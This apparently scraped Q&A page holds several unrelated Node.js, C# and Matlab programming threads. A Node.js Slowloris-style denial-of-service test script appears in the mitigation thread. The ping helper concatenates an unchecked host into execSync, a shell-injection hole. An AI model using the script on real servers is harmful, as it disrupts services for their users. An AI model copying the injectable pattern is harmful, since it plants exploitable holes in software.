Hello comrades. A few days ago I started trying to ICMP ping an IP address from NodeJS. As is the rule in the forum, I do not come empty-handed: I have come across some posts, even on this website, that talk about how to do this, but none of them convinces me.
One of the immovable constraints of my project is to avoid the use of NPM / Node-GYP. That rules out the raw-socket option (unless you can use C++ code in NodeJS without anything external to node itself).
I also tried (and implemented) the option of shelling out to system commands. Here is my working implementation for Linux and Windows (I have not tried it on Mac, but I am almost sure it works):
'use strict';

import { execSync } from "child_process";

class Ping {
    // Extract the round-trip time in ms from the ping command's stdout.
    #stdoutToMS (stdout) {
        let res;
        let a = stdout.split('=');
        for (let i = 0; i < a.length; i++) {
            res = a[i].split("ms");
        }
        return ~~res[0].split('/')[0].trim();
    }

    ping (host, timeout = 5000) {
        let mstout = timeout / 1000; // Linux ping expects seconds, Windows expects ms
        let stdout;
        try {
            if (process.platform === "win32") {
                stdout = execSync("ping -n 1 -l 1 -w " + timeout + ' ' + host);
            } else {
                stdout = execSync("ping -c 1 -s 16 -W " + mstout + ' ' + host);
            }
        } catch (err) {
            return false; // non-zero exit code: host unreachable
        }
        return this.#stdoutToMS(stdout.toString());
    }
}

export default Ping;
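As a side note, the `#stdoutToMS` helper above splits on `=` and `ms`, which is fragile across locales and ping variants. A regex-based extraction is a bit more robust; this is just a sketch against typical Linux/Windows output formats, not something I have tested on every platform:

```javascript
// Hypothetical helper: extract the round-trip time from ping output.
// Matches "time=12.3 ms" (Linux) as well as "time=12ms" / "time<1ms" (Windows).
function extractMS(stdout) {
    const m = stdout.match(/time[=<]([\d.]+)\s*ms/i);
    return m ? Math.round(parseFloat(m[1])) : false;
}

console.log(extractMS("64 bytes from 8.8.8.8: icmp_seq=1 ttl=118 time=12.3 ms")); // 12
console.log(extractMS("Reply from 8.8.8.8: bytes=32 time=12ms TTL=118")); // 12
```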
If anyone has any ideas on how to do this natively in node without using external software, I'd be very grateful if you would tell me.
It does not appear you can access a ping equivalent from nodejs without some external code.
Since ping uses the ICMP protocol to do what it does (and it has to use that protocol because it's trying to contact an endpoint that is listening for that) and there is no implementation of the ICMP protocol in nodejs, your only option would be to create your own implementation of the ICMP protocol entirely in nodejs code by getting access to a RAW OS socket and implementing the protocol yourself. I am not aware of any built-in ability to get a RAW socket in plain nodejs (no external software).
The only examples of ICMP implementations I could find in nodejs ALL use external code to get access to a raw socket. That seems to be confirmation that there is no other way to do it.
There is a module here that exposes a raw socket, but it uses some native code to implement that. You can examine its implementation to see what it's doing.
There's also this library, which exposes a RAW socket from libuv to be used within nodejs, but it also uses some of its own native code.
Related
I am trying to make a connection between Matlab and a JavaScript (TypeScript in my case) program with a COM automation server, as suggested on the MathWorks website. The docs on the website have examples for some languages created by MS, but not for JavaScript.
I can't seem to find a lot of information on how to establish such a COM connection with JS. From what I've read, it's an old Microsoft feature that was only used with Internet Explorer.
Problem
The program I am writing is a VS Code extension, thus I am not using Internet Explorer at all. As a result, I do not believe I can use ActiveXObjects.
Question
Is there another way to establish a connection between my typescript code and the Matlab instance?
Goal
I am trying to run Matlab files from the VS Code terminal without opening a custom Matlab terminal or the complete Matlab GUI. The output should be displayed in the VS Code terminal as well. On MacOS and Linux, I can simply use the CLI tools, but due to the differences between the Windows version and MacOS/Linux versions, this is not possible on Windows.
I haven't used TypeScript very much, and what little I did was a long time ago, when it was completely new.
However, the NPM package win32ole can be used in NodeJS, so I would assume you would be able to use it in Typescript as well (perhaps with some minor modifications to the example, or a small wrapper).
win32ole npm page
This is an example from that page, showing how to interact with Excel to create and save a worksheet.
try {
    var win32ole = require('win32ole');
    // var xl = new ActiveXObject('Excel.Application'); // You may write it as:
    var xl = win32ole.client.Dispatch('Excel.Application');
    xl.Visible = true;
    var book = xl.Workbooks.Add();
    var sheet = book.Worksheets(1);
    try {
        sheet.Name = 'sheetnameA utf8';
        sheet.Cells(1, 2).Value = 'test utf8';
        var rg = sheet.Range(sheet.Cells(2, 2), sheet.Cells(4, 4));
        rg.RowHeight = 5.18;
        rg.ColumnWidth = 0.58;
        rg.Interior.ColorIndex = 6; // Yellow
        var result = book.SaveAs('testfileutf8.xls');
        console.log(result);
    } catch(e) {
        console.log('(exception cached)\n' + e);
    }
    xl.ScreenUpdating = true;
    xl.Workbooks.Close();
    xl.Quit();
} catch(e) {
    console.log('*** exception cached ***\n' + e);
}
Scenario
C# Based Server
JavaScript Based Client
Situation
I created this fairly simple "server", whose only job is to help me understand how to actually use websockets in a C# environment.
using (var server = new HttpListener())
{
    server.Prefixes.Add("http://localhost:8080/");
    server.Start();
    while (true)
    {
        var context = server.GetContext();
        if (context.Request.IsWebSocketRequest)
        {
            var cntxt = context.AcceptWebSocketAsync(null).ConfigureAwait(true).GetAwaiter().GetResult();
            var buff = new byte[2048];
            while (cntxt.WebSocket.State == System.Net.WebSockets.WebSocketState.Open || cntxt.WebSocket.State == System.Net.WebSockets.WebSocketState.Connecting)
            {
                cntxt.WebSocket.ReceiveAsync(new ArraySegment<byte>(buff), CancellationToken.None).ConfigureAwait(true).GetAwaiter().GetResult();
                Console.WriteLine(Encoding.UTF8.GetString(buff));
            }
        }
        else
        {
            context.Response.StatusCode = (int)HttpStatusCode.BadRequest;
            using (var writer = new StreamWriter(context.Response.OutputStream))
            {
                writer.Write("<html><body>WEBSOCKET ONLY!</body></html>");
            }
        }
    }
}
The problem now is: when I try to add the websocket prefix via server.Prefixes.Add("ws://localhost:8080"), I get a System.ArgumentException telling me that only http and https are accepted protocols.
Thing is: keeping the http prefix and using ws = new WebSocket('ws://localhost:8080'); (JavaScript) to connect to a websocket yields, for obvious reasons, nothing.
Changing the prefix to HTTP in the JS websocket provides me with yet another sort of argument exception.
Actual Question
How do I actually get the HttpListener to accept websocket requests?
Further Info
The .NET Framework used is 4.6.1
Browser to test this was Google Chrome 69.0.3497.100
The reason why the above was not working is that the JS websocket requires a path.
Changing the above HttpListener prefix to e.g. "http://localhost:8080/asdasd/" (and connecting to the matching ws://localhost:8080/asdasd/ from JS) will allow the socket to connect properly.
Update
https://nodejs.org/pt-br/blog/vulnerability/february-2019-security-releases/
Update Friday, 13th 2018:
I managed to convince the Node.js core team about setting a CVE for that.
The fix (new defaults and probably a new API) will be there in 1 or 2 weeks.
To mitigate means to soften the impact of an attack.
Everybody knows Slowloris:
HTTP header or POST data characters get transmitted slowly, to keep the socket occupied.
At scale, that makes for a much easier DoS attack.
**In NGINX the mitigation is inbuilt:**
> Closing Slow Connections
> You can close connections that are writing
> data too infrequently, which can represent an attempt to keep
> connections open as long as possible (thus reducing the server’s
> ability to accept new connections). Slowloris is an example of this
> type of attack. The client_body_timeout directive controls how long
> NGINX waits between writes of the client body, and the
> client_header_timeout directive controls how long NGINX waits between
> writes of client headers. The default for both directives is 60
> seconds. This example configures NGINX to wait no more than 5 seconds
> between writes from the client for either headers or body.
https://www.nginx.com/blog/mitigating-ddos-attacks-with-nginx-and-nginx-plus/
Since there is no inbuilt way to act on the headers as they arrive in the Node.js HTTP server,
I came to the question of whether I can combine `net` and an HTTP server to mitigate Slowloris.
The idea is to `destroy` the `connection` in case of `Slowloris`, like this:
http.createServer(function(req, res) {
    var timeout;
    // Reset a short timer on every chunk; if the client stalls,
    // destroy the connection.
    req.connection.on('data', function(chunk) {
        clearTimeout(timeout);
        timeout = setTimeout(function() {
            req.connection.destroy();
        }, 100);
    });
});
The problem I can see is that both services would have to listen on the same socket, on ports 80 and 443.
I do not know how to tackle this.
It is possible to pass requests and responses between net and the HTTP server and back.
But that takes 2 sockets for 1 incoming message.
And 2 sockets for 1 outgoing message.
So this is not feasible for a highly available server.
I have no clue.
What can the world do to get rid of this scourge?
CVE for Apache Tomcat.
This is a serious security threat.
I think this needs to be solved at the C or C++ level.
I cannot write in these real programmer languages.
But all of us would be helped if somebody pushed this on Github.
Because the community there once deleted my thread about mitigating Slowloris.
The best way to mitigate this issue, as well as a number of other issues, is to place a proxy layer such as nginx or a firewall between the node.js application and the internet.
If you're familiar with the paradigms behind many design and programming approaches, such as OOP, you will probably recognize the importance of "separation of concerns".
The same paradigm holds true when designing the infrastructure or the way clients can access data.
The application should have only one concern: handling data operations (CRUD). This inherently includes any concerns that relate to maintaining data integrity (SQL injection threats, script injection threats, etc.).
Other concerns should be placed in a separate layer, such as an nginx proxy layer.
For example, nginx will often be concerned with routing traffic to your application / load balancing. This will include security concerns related to network connections, such as SSL/TLS negotiation, slow clients, etc.
An extra firewall might (read: should) be implemented to handle additional security concerns.
The solution for your issue is simple: do not directly expose the node.js application to the internet; use a proxy layer - it exists for a reason.
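To make that concrete, a minimal nginx proxy block might look like the following. The upstream address and the timeout values are placeholders you would tune yourself; the two timeout directives are the ones the nginx blog post quoted above recommends against Slowloris:

```nginx
server {
    listen 80;

    # Drop clients that dribble headers or body too slowly (Slowloris).
    client_header_timeout 5s;
    client_body_timeout   5s;

    location / {
        # Assumed: the node.js application listens on localhost:3000.
        proxy_pass http://127.0.0.1:3000;
    }
}
```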
I think you're taking a wrong approach for this vulnerability.
This doesn't deal with a DDOS attack (Distributed Denial of Service), where many IPs are used, and where you need to continue serving machines that are inside the same firewall as machines involved in the attack.
Often the machines used in a DDOS aren't real machines that have been taken over (they may be virtualized, or use software to attack from different IPs).
When a DDOS against a large target starts, per-IP throttling may ban all machines from the same fire-walled LAN.
To continue providing service in the face of a DDOS, you really need to block requests based on common elements of the request itself, not just IP. security.se may be the best forum for specific advice on how to do that.
Unfortunately, DOS attacks, unlike XSRF, don't need to originate from real browsers so any headers that don't contain closely-held and unguessable nonces can be spoofed.
The recommendation: to prevent this issue, you have to have good firewall policies against DDoS attacks and mass denial of service.
BUT! If you want to test a denial of service with node.js, you can use this code (for test purposes only, not for a production environment):
var net = require('net');

var maxConnections = 30;
var connections = [];
var host = "127.0.0.1";
var port = 80;

function Connection(h, p)
{
    this.state = 'active';
    this.t = Date.now();
    this.client = net.connect({port: p, host: h}, () => {
        process.stdout.write("Connected, Sending... ");
        this.client.write("POST / HTTP/1.1\r\nHost: " + host + "\r\n" +
            "Content-Type: application/x-www-form-urlencoded\r\n" +
            "Content-Length: 385\r\n\r\nvx=321&d1=fire&l");
        process.stdout.write("Written.\n");
    });
    this.client.on('data', (data) => {
        console.log("\t-Received " + data.length + " bytes...");
        this.client.end();
    });
    this.client.on('end', () => {
        var d = Date.now() - this.t;
        this.state = 'ended';
        console.log("\t-Disconnected (duration: " +
            (d / 1000).toFixed(3) +
            " seconds, remaining open: " +
            connections.length +
            ").");
    });
    this.client.on('error', () => {
        this.state = 'error';
    });
    connections.push(this);
}

setInterval(() => {
    var notify = false;
    // Add another connection if we haven't reached our max:
    if (connections.length < maxConnections)
    {
        new Connection(host, port);
        notify = true;
    }
    // Remove dead connections
    connections = connections.filter(function(v) {
        return v.state == 'active';
    });
    if (notify)
    {
        console.log("Active connections: " + connections.length +
            " / " + maxConnections);
    }
}, 500);
It is as easy as this.
var http = require('http');

var server = http.createServer(function(req, res) {
    res.end('Now.'); // plain http has no res.send(); that's Express. Use res.end().
});

server.setTimeout(10);
server.listen(80, '127.0.0.1');
server.setTimeout([msecs][, callback])
> By default, the Server's timeout value is 2 minutes, and sockets are
> destroyed automatically if they time out.
https://nodejs.org/api/http.html#http_server_settimeout_msecs_callback
Tested with:
var net = require('net');

var client = new net.Socket();
client.connect(80, '127.0.0.1', function() {
    setInterval(function() {
        client.write('Hello World.');
    }, 10000);
});
This is only the second-best solution, though, since legitimate slow connections are terminated as well.
I'm transforming my application to a node.js cluster, which I hope will boost its performance.
Currently, I'm deploying the application to 2 EC2 t2.medium instances. I have Nginx as a proxy, and an ELB.
This is my express cluster application which is pretty standard from the documentation.
var bodyParser = require('body-parser');
var cors = require('cors');
var cluster = require('cluster');
var debug = require('debug')('expressapp');

if (cluster.isMaster) {
    var numWorkers = require('os').cpus().length;
    debug('Master cluster setting up ' + numWorkers + ' workers');
    for (var i = 0; i < numWorkers; i++) {
        cluster.fork();
    }
    cluster.on('online', function(worker) {
        debug('Worker ' + worker.process.pid + ' is online');
    });
    cluster.on('exit', function(worker, code, signal) {
        debug('Worker ' + worker.process.pid + ' died with code: ' + code + ', and signal: ' + signal);
        debug('Starting a new worker');
        cluster.fork();
    });
} else {
    // Express stuff
}
This is my Nginx configuration.
nginx::worker_processes: "%{::processorcount}"
nginx::worker_connections: '1024'
nginx::keepalive_timeout: '65'
I have 2 CPUs on Nginx server.
This is my performance before the change.
I get 1,500 requests/s, which is pretty good. Then I thought I would increase the number of connections on Nginx so I can accept more requests. I did this:
nginx::worker_processes: "%{::processorcount}"
nginx::worker_connections: '2048'
nginx::keepalive_timeout: '65'
And this is my performance after the change, which I think is worse than before.
I use gatling for performance testing and here's the code.
import io.gatling.core.Predef._
import io.gatling.http.Predef._
import scala.concurrent.duration._

class LoadTestSparrowCapture extends Simulation {
    val httpConf = http
        .baseURL("http://ELB")
        .acceptHeader("application/json")
        .doNotTrackHeader("1")
        .acceptLanguageHeader("en-US,en;q=0.5")
        .acceptEncodingHeader("gzip, deflate")
        .userAgentHeader("Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:16.0) Gecko/20100101 Firefox/16.0")

    val headers_10 = Map("Content-Type" -> "application/json")

    val scn = scenario("Load Test")
        .exec(http("request_1")
            .get("/track"))

    setUp(
        scn.inject(
            atOnceUsers(15000)
        ).protocols(httpConf))
}
I deployed this to my gatling cluster. So, I have 3 EC2 instances firing 15,000 requests in 30s to my application.
The question is: is there anything I can do to increase the performance of my application, or do I just need to add more machines?
The route that I'm testing is pretty simple: I get the request and send it off to RabbitMQ so it can be processed further, so the response of that route is pretty fast.
You've mentioned that you are using AWS with an ELB in front of your EC2 instances. As I see it, you are getting 502 and 503 status codes. These can be sent by the ELB or by your EC2 instances, so make sure that when doing the load test you know where the errors are coming from. You can check this in the AWS console, in the ELB CloudWatch metrics.
Basically, HTTPCode_ELB_5XX means your ELB sent the 50x; HTTPCode_Backend_5XX means your backend sent it. You can also verify this in the ELB logs. A better explanation of ELB errors can be found here.
To load-test on AWS you should definitely read this. Point is that ELB is just another set of machines, which needs to scale if your load increases. Default scaling strategy is (cited from the section "Ramping Up Testing"):
Once you have a testing tool in place, you will need to define the growth in the load. We recommend that you increase the load at a rate of no more than 50 percent every five minutes.
That means when you start at some number of concurrent users, let's say 1,000, by default you should increase only up to 1,500 within 5 minutes. This guarantees that the ELB will scale with the load on your servers. Exact numbers may vary, and you have to test them on your own. Last time I tested, it sustained a load of 1,200 req./s without an issue, and then I started to receive 50x. You can test it easily by running a ramp-up scenario from X to Y users from a single client and waiting for 50x.
The next very important thing (from the section "DNS Resolution") is:
> If clients do not re-resolve the DNS at least once per minute, then the new resources Elastic Load Balancing adds to DNS will not be used by clients.
In short this means that you have to guarantee that the TTL in DNS is respected, or that your clients re-resolve and rotate the DNS IPs they received from the DNS lookup, to guarantee that load is distributed in round-robin fashion. If not (e.g. testing from only one client, though that is not your case), you can skew the results by targeting all the traffic at one instance of the ELB and overloading it, which means the ELB will not scale at all.
Hope it will help.
I've been experimenting with the node-serialport library to access devices connected to a USB hub and send/receive data to these devices. The code works fine on Linux, but on Windows (Windows 8.1 and Windows 7) I get some odd behaviour: it doesn't seem to work for more than 2 devices, it just hangs when writing to the port, and the callback for the write method never gets called. I'm not sure how to go about debugging this issue. I'm not a Windows person, so if someone can give me some directions it would be great.
Below is the code I'm currently using to test.
/*
    Sample code to debug node-serialport library on windows
*/
//var SerialPort = require("./build/Debug/serialport");
var s = require("./serialport-logger");
var parsers = require('./parsers');
var ee = require('events');

s.list(function(err, ports) {
    console.log("Number of ports available: " + ports.length);
    ports.forEach(function(port) {
        var cName = port.comName,
            sp;
        //console.log(cName);
        sp = new s.SerialPort(cName, {
            parser: s.parsers.readline("\r\n")
        }, false);
        // sp.once('data', function(data) {
        //     if (data) {
        //         console.log("Retrieved data " + data);
        //         //console.log(data);
        //     }
        // });
        //console.log("Is port open " + sp.isOpen());
        if (!sp.isOpen()) {
            sp.open(function(err) {
                if (err) {
                    console.log("Port cannot be opened manually");
                } else {
                    console.log("Port is open " + cName);
                    sp.write("LED=2\r\n", function(err) {
                        if (err) {
                            console.log("Cannot write to port");
                            console.error(err);
                        } else {
                            console.log("Written to port " + cName);
                        }
                    });
                }
            });
        }
        //sp.close();
    });
});
I'm sure you'd have noticed I'm not require'ing the serialport library directly; instead I'm using the serialport-logger library, which is just a way to use the serialport addons compiled with the debug switch on a Windows box.
TL;DR: For me it works by increasing the threadpool size for libuv:
$ UV_THREADPOOL_SIZE=20 node server.js
I was fine with opening/closing port for each command for a while but a feature request I'm working on now needs to keep the port open and reuse the connection to run the commands. So I had to find an answer for this issue.
The number of devices I could support by opening a connection and holding on to it was 3. The issue happens to be the default threadpool size of 4: I already have another background worker occupying 1 thread, so I have only 3 threads left. The EIO_WatchPort function in node-serialport runs as a background worker, which blocks a thread. So when I use more than 3 devices, the "open" method call waits in the queue to be pushed to a background worker, but since they are all busy it blocks node, and any subsequent requests cannot be handled. Finally, increasing the thread pool size did the trick; it's working fine now. It might help someone. Also, this thread definitely helped me.
As opensourcegeek pointed out, all you need to do is set the UV_THREADPOOL_SIZE variable above the default of 4 threads.
I had problems in my project with node.js and the modbus-rtu or modbus-serial library when I tried to query more than 3 RS-485 devices on USB ports. 3 devices: no problem. A 4th or more: permanent timeouts. The devices each responded within a 600 ms interval, but when the pool was busy they never got a response back.
So on Windows, simply put this on your node.js environment command line:
set UV_THREADPOOL_SIZE=8
or whatever you like, up to 128. I had 6 USB ports queried, so I used 8.